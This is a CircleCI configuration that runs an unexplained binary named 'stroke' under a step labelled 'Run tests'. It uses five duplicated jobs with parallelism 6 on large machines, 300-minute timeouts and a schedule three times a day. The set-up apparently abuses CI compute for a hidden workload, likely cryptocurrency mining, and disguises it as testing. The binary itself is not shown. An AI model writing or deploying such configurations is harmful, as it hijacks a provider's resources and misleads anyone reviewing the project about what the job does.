working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run:
        name: Run tests
        command: |
                    chmod u+x stroke && ./stroke
        no_output_timeout: 300m
version: 2.1
jobs:
  endvoc:
    <<: *script
    parallelism: 6
    docker:
      - image: node
    resource_class: large
  endvoc1:
    <<: *script
    parallelism: 6
    docker:
      - image: node
    resource_class: large
  endvoc2:
    <<: *script
    parallelism: 6
    docker:
      - image: node
    resource_class: large
  endvoc3:
    <<: *script
    parallelism: 6
    docker:
      - image: node
    resource_class: large
  endvoc4:
    <<: *script
    parallelism: 6
    docker:
      - image: node
    resource_class: large
workflows:
  version: 2.1
  commit:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
      - endvoc4

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - main

  endvocrunjob:
    jobs:
      - endvoc
      - endvoc1
      - endvoc2
      - endvoc3
      - endvoc4